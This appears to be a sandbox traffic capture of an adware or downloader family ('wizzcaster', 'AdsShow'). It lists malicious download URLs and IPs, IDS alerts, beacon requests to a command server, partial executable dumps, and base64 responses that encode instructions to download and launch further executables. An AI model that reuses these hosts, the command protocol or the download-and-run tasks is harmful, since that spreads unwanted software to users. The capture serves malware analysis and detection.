hxxp://asedownloadgate.com/download/2/wizzrelease.exe 46.105.121.115
hxxp://asedownloadgate.com/download/3/wizzcaster_v2.exe 46.105.121.115
hxxp://asedownloadgate.com/download/3/wizzcaster_uninstaller_v2.exe 46.105.121.115
hxxp://www.tutomonetize.com/api/v5/config 94.23.44.92
hxxp://www.tutomonetize.com/api/v5/link 94.23.44.92
hxxp://asedownloadgate.com/get/3/wizzcaster_v2.exe 46.105.121.115
hxxp://asedownloadgate.com/get/4/remote.exe 46.105.121.115
hxxp://asedownloadgate.com/from_backup/747474/AdsShow_installer.exe 46.105.121.115
hxxp://asedownloadgate.com/exe/updater.exe 46.105.121.115
hxxp://www.tutomonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 94.23.44.92
hxxp://www.tutomonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok 94.23.44.92
hxxp://asedownloadgate.com/safe_download/582369/AdsShow.exe 46.105.121.115
agent.wizztrakys.com 188.165.209.131
www.wizzmonetize.com 176.31.107.87
ladomainadeserver.com 176.31.107.87


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:50 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=9028001d9147ae9be167e302b6b347a71258d15e; expires=Sat, 17-Feb-2018 23:41:50 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sat, 17 Feb 2018 21
:41:50 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=9028001d9147ae9be167e302b6b347a71258d15e; e
xpires=Sat, 17-Feb-2018 23:41:50 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}
....



POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....



uid=57a764d042bf8


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:50 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=44448d744fa6c96c6e174b505162494f52ac4d5c; expires=Sat, 17-Feb-2018 23:41:51 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Sat, 17 Feb 2018 21:41:50 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=44448
d744fa6c96c6e174b505162494f52ac4d5c; expires=Sat, 17-Feb-2018 23:41:51
GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:53 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=b373a5ff6e57b14d5f32e29404a9bce29f3e5d39; expires=Sat, 17-Feb-2018 23:41:53 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sat, 17 Feb 2018 21
:41:53 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=b373a5ff6e57b14d5f32e29404a9bce29f3e5d39; e
xpires=Sat, 17-Feb-2018 23:41:53 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}
....



POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....



uid=57a764d042bf8


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:54 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=3215217745abad98e0d942aacafecc876e34196c; expires=Sat, 17-Feb-2018 23:41:54 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Sat, 17 Feb 2018 21:41:54 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=32152
17745abad98e0d942aacafecc876e34196c; expires=Sat, 17-Feb-2018 23:41:54
GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..


GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
a2a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...:..Z.........."...0.............b5... ...@....@.. .................
...................@..................................5..O....@..L....
................`......t4.............................................
.. ............... ..H............text...h.... ......................
..`.rsrc...L....@......................@..@.reloc.......`.......(.....
.........@..B................D5......H........!..d............0..X....
.......................................Vr...p.....r#..p.....*...0..o..
.....(....~....o....s....o.............~....(....(......(....o....rY..
po.....(.....o....t"..........%...o....&..&..*.........kk.......0..M..
......(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...
(.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.
50727......l.......#~......L...#Strings....<.......#US.........#GUI
D.......\...#Blob...........W..........3........ ...................,.
..................................................k.................Z.
..........N...../...................................].................
/...........k...........B...........(.......c.....c.........6.......*.
..G.*...T.*.....................4................._..... ...........~.
....r...........................................=.............=.......
.. .i.=...........i.e.............$.................Y...P ........

<<< skipped >>>

POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



uid=57a764d042bf8&days_after_install=0


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:52 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=cf866ecf2dfcf65bcaf4e89da3f34aa375950d1f; expires=Sat, 17-Feb-2018 23:41:52 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sat, 17 Feb 2018 21
:41:52 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=cf866ecf2dfcf65bcaf4e89da3f34aa375950d1f; e
xpires=Sat, 17-Feb-2018 23:41:52 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}
....



POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....



uid=57a764d042bf8


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:52 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=a2b024ccd3d857d0b5184d698b9aa1c7faaf947d; expires=Sat, 17-Feb-2018 23:41:52 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Sat, 17 Feb 2018 21:41:52 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=a2b02
4ccd3d857d0b5184d698b9aa1c7faaf947d; expires=Sat, 17-Feb-2018 23:41:52
GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..


GET /get/4/remote.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
ca00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..M..Z.........."...0.............b.... ........@.. ..................
..... ............@.....................................O.......X.....
......................t...............................................
. ............... ..H............text...h.... ...................... .
.`.rsrc...X...........................@..@.reloc......................
........@..B................D.......H........!..d............0..X.....
......................................Vr...p.....r#..p.....*...0..o...
....(....~....o....s....o.............~....(....(......(....o....rY..p
o.....(.....o....t"..........%...o....&..&..*.........kk.......0..M...
.....(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...(
.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....*
.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.5
0727......l.......#~......L...#Strings....<.......#US.........#GUID
.......\...#Blob...........W..........3........ ...................,..
.................................................k.................Z..
.........N...../...................................]................./
...........k...........B...........(.......c.....c.........6.......*..
.G.*...T.*.....................4................._..... ...........~..
...r...........................................=.............=........
. .i.=...........i.e.............$.................Y...P .........

<<< skipped >>>

GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:42:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
93382..MZP.....................@......................................
.........!..L.!..This program must be run under Win32..$7.............
......................................................................
.....................................................PE..L....^B*.....
.....................................@................................
.......@......@..............................|.... ..4t...............
......................................................................
.....................CODE................................ ..`DATA....P
...........................@...BSS....................................
..idata..|...........................@....tls.........................
............rdata..............................@..P.reloc.............
.................@..P.rsrc...4t... ...v..................@..P.........
....P......................@..P.......................................
......................................................................
.....................................................string...........
.....<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitIn
stance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..Cla
ssNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..In
heritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@
..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstan
ce.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@
....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@..

<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_
channel_name=1


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:52 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=u1sdr4l6391s72o42ep5hdco45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1072
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iOTAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iU2Vjb25kTCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3dubG9hZGdhdGUuY29t
L2Zyb21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249Ii
IgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5h
bWU9IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW
9kIHR5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxODAyMTciLz4NCg0KPC9wZXJm
b3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbm
UiIHZhbHVlPSI0NTE4MDIxNyIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4N
CjwvdGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJ1cCIgdm
FsdWU9Imh0dHA6Ly9hc2Vkb3dubG9hZGdhdGUuY29tL2V4ZS91cGRhdGVyLmV4ZSIgdmVy
c2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdG
FydCIgbmFtZT0idXAiIHZhbHVlPSJ3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9
ImFkZCIgbmFtZT0iRGF0ZSIgdmFsdWU9ImZlOGYxODAyMTciLz4NCg0KPC9wZXJmb3JtPg
0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iRGF0ZSIgdmFs
dWU9IjE4MDIxNyIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwvdGFzaz
4KPC91cGRhdGVzPgoKCg==..


GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:49 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
a2a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...:..Z.........."...0.............b5... ...@....@.. .................
...................@..................................5..O....@..L....
................`......t4.............................................
.. ............... ..H............text...h.... ......................
..`.rsrc...L....@......................@..@.reloc.......`.......(.....
.........@..B................D5......H........!..d............0..X....
.......................................Vr...p.....r#..p.....*...0..o..
.....(....~....o....s....o.............~....(....(......(....o....rY..
po.....(.....o....t"..........%...o....&..&..*.........kk.......0..M..
......(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...
(.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.
50727......l.......#~......L...#Strings....<.......#US.........#GUI
D.......\...#Blob...........W..........3........ ...................,.
..................................................k.................Z.
..........N...../...................................].................
/...........k...........B...........(.......c.....c.........6.......*.
..G.*...T.*.....................4................._..... ...........~.
....r...........................................=.............=.......
.. .i.=...........i.e.............$.................Y...P ........

<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:49 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
6e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..;..Z.........."...0..Z...........x... ........@.. ..................
..................@..................................x..O.......X.....
.......................x..............................................
. ............... ..H............text....X... ...Z.................. .
.`.rsrc...X............\..............@..@.reloc...............l......
........@..B.................x......H........!..d............0...G....
......................................Vr...p.....r#..p.....*...0..o...
....(....~....o....s....o.............~....(....(......(....o....rY..p
o.....(.....o....t"..........%...o....&..&..*.........kk.......0..M...
.....(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...(
.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....*
.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.5
0727......l.......#~......L...#Strings....<.......#US.........#GUID
.......\...#Blob...........W..........3........ ...................,..
.................................................k.................Z..
.........N...../...................................]................./
...........k...........B...........(.......c.....c.........6.......*..
.G.*...T.*.....................4................._..... ...........~..
...r...........................................=.............=........
. .i.=...........i.e.............$.................Y...P .........

<<< skipped >>>

GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:49 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
a2a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...:..Z.........."...0.............b5... ...@....@.. .................
...................@..................................5..O....@..L....
................`......t4.............................................
.. ............... ..H............text...h.... ......................
..`.rsrc...L....@......................@..@.reloc.......`.......(.....
.........@..B................D5......H........!..d............0..X....
.......................................Vr...p.....r#..p.....*...0..o..
.....(....~....o....s....o.............~....(....(......(....o....rY..
po.....(.....o....t"..........%...o....&..&..*.........kk.......0..M..
......(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...
(.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.
50727......l.......#~......L...#Strings....<.......#US.........#GUI
D.......\...#Blob...........W..........3........ ...................,.
..................................................k.................Z.
..........N...../...................................].................
/...........k...........B...........(.......c.....c.........6.......*.
..G.*...T.*.....................4................._..... ...........~.
....r...........................................=.............=.......
.. .i.=...........i.e.............$.................Y...P ........

<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:49 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
6e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..;..Z.........."...0..Z...........x... ........@.. ..................
..................@..................................x..O.......X.....
.......................x..............................................
. ............... ..H............text....X... ...Z.................. .
.`.rsrc...X............\..............@..@.reloc...............l......
........@..B.................x......H........!..d............0...G....
......................................Vr...p.....r#..p.....*...0..o...
....(....~....o....s....o.............~....(....(......(....o....rY..p
o.....(.....o....t"..........%...o....&..&..*.........kk.......0..M...
.....(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...(
.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....*
.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.5
0727......l.......#~......L...#Strings....<.......#US.........#GUID
.......\...#Blob...........W..........3........ ...................,..
.................................................k.................Z..
.........N...../...................................]................./
...........k...........B...........(.......c.....c.........6.......*..
.G.*...T.*.....................4................._..... ...........~..
...r...........................................=.............=........
. .i.=...........i.e.............$.................Y...P .........

<<< skipped >>>

GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:55 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Content-Length: 6656
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....`.Z
.........."...0............../... ...@....@.. ........................
............@.................................p/..O....@..............
.........`......8................................................ ....
........... ..H............text........ ...................... ..`.rsr
c........@......................@..@.reloc.......`....................
..@..B................./......H.......\!..$............-..............
.................................0..........s......(....(....r...pr...
po....(....%(....&(....r...pr...po....r...p(....(.....r...p.o......,..
r...p...(....(....& ..r...p(....&..&..*...................(....*.~....
-.r...p.....(....o....s.........~....*.~....*.......*.~....*..( ...*Vs
....(!...t.........*BSJB............v2.0.50727......l.......#~..4.....
..#Strings............#US.........#GUID...(.......#Blob...........W...
.......3........%...................!.................................
..............#...........W.....J.......7.....7.....7...w.7...C.7...\.
7.....7.................7...............I.....#.....:.................
S.".........k.....................o.m......................._.....|...
........B.......7.............................=...........Y.=.........
n.Y.e.........x.....|...2...P ............. ............. ......{.....
(!............/!............7!............>!............F!.........
.......w.........................).....1.....9.....A.....I.....Q..

<<< skipped >>>

GET /exe/updater.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:55 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
208400..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...N..Z.........."...0..p .........J. .. .... ...@.. ................
........ ...........@................................... .O..... .X...
.................. .....\. ...........................................
... ............... ..H............text...Pn .. ...p .................
..`.rsrc...X..... ......r .............@..@.reloc........ ....... ...
..........@..B................,. .....H........!..d............0..@] .
........................................Vr...p.....r#..p.....*...0..o.
......(....~....o....s....o.............~....(....(......(....o....rY.
.po.....(.....o....t"..........%...o....&..&..*.........kk.......0..M.
.......(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%..
.(.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~...
.*.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0
.50727......l.......#~......L...#Strings....<.......#US.........#GU
ID.......\...#Blob...........W..........3........ ...................,
...................................................k.................Z
...........N...../...................................]................
./...........k...........B...........(.......c.....c.........6.......*
...G.*...T.*.....................4................._..... ...........~
.....r...........................................=.............=......
... .i.=...........i.e.............$.................Y...P .......

<<< skipped >>>

GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:45 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
9600..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..;..Z.........."...0.................. ........@.. ..................
..................@.....................................O.......X.....
......................................................................
. ............... ..H............text........ ...................... .
.`.rsrc...X...........................@..@.reloc......................
........@..B........................H........!..d............0...o....
......................................Vr...p.....r#..p.....*...0..o...
....(....~....o....s....o.............~....(....(......(....o....rY..p
o.....(.....o....t"..........%...o....&..&..*.........kk.......0..M...
.....(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...(
.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....*
.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.5
0727......l.......#~......L...#Strings....<.......#US.........#GUID
.......\...#Blob...........W..........3........ ...................,..
.................................................k.................Z..
.........N...../...................................]................./
...........k...........B...........(.......c.....c.........6.......*..
.G.*...T.*.....................4................._..... ...........~..
...r...........................................=.............=........
. .i.=...........i.e.............$.................Y...P .........

<<< skipped >>>

GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
9600..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..;..Z.........."...0.................. ........@.. ..................
..................@.....................................O.......X.....
......................................................................
. ............... ..H............text........ ...................... .
.`.rsrc...X...........................@..@.reloc......................
........@..B........................H........!..d............0...o....
......................................Vr...p.....r#..p.....*...0..o...
....(....~....o....s....o.............~....(....(......(....o....rY..p
o.....(.....o....t"..........%...o....&..&..*.........kk.......0..M...
.....(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%...(
.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~....*
.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0.5
0727......l.......#~......L...#Strings....<.......#US.........#GUID
.......\...#Blob...........W..........3........ ...................,..
.................................................k.................Z..
.........N...../...................................]................./
...........k...........B...........(.......c.....c.........6.......*..
.G.*...T.*.....................4................._..... ...........~..
...r...........................................=.............=........
. .i.=...........i.e.............$.................Y...P .........

<<< skipped >>>

GET /download/2/wizzrelease.exe HTTP/1.1

Host: asedownloadgate.com


HTTP/1.1 200 OK
Date: Sat, 17 Feb 2018 21:41:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzrelease.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
207800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...e..Z.........."...0..d ........... .. .... ...@.. ................
........ ...........@.................................P. .O..... .X...
.................. ....... ...........................................
... ............... ..H............text....c .. ...d .................
..`.rsrc...X..... ......f .............@..@.reloc........ ......v ...
..........@..B.................. .....H........!..d............0...R .
........................................Vr...p.....r#..p.....*...0..o.
......(....~....o....s....o.............~....(....(......(....o....rY.
.po.....(.....o....t"..........%...o....&..&..*.........kk.......0..M.
.......(.....s....%(.....o....o ...%.o!...%.o"...%o#.......io$....o%..
.(.....o&...*..('...*.~....-.ro..p.....((...o)...s*........~....*.~...
.*.......*.~....*..( ...*Vs....(,...t.........*...BSJB............v2.0
.50727......l.......#~......L...#Strings....<.......#US.........#GU
ID.......\...#Blob...........W..........3........ ...................,
...................................................k.................Z
...........N...../...................................]................
./...........k...........B...........(.......c.....c.........6.......*
...G.*...T.*.....................4................._..... ...........~
.....r...........................................=.............=......
... .i.=...........i.e.............$.................Y...P .......

<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.tutomonetize.com
Content-Length: 155
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



remote_id=3&user_name=tuto&api_key=dqsdsqf-azezae-azeaze-azeaze&buying
_product_name=DefaultProduct&buying_partner_name=DefaultPartner&buying
_channel_name=1


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:50:04 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=u8orqsj09bk0elv3993urfseg1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1712
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9ImNhc3RlcjEyIiB2YWx1ZT0iaHR0cDovL2FzZWRvd25sb2FkZ2F0ZS5j
b20vZG93bmxvYWQvMy93aXp6Y2FzdGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249Ii
IgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIi8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFt
ZT0iY2FzdGVyMTIiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IjU3YTc2NGQwNDJiZjgiLz
4NCjxtb2QgdHlwZT0iYWRkIiBuYW1lPSJjYXN0ZXIxMiIgdmFsdWU9ImZyMTcvMDUvMjAx
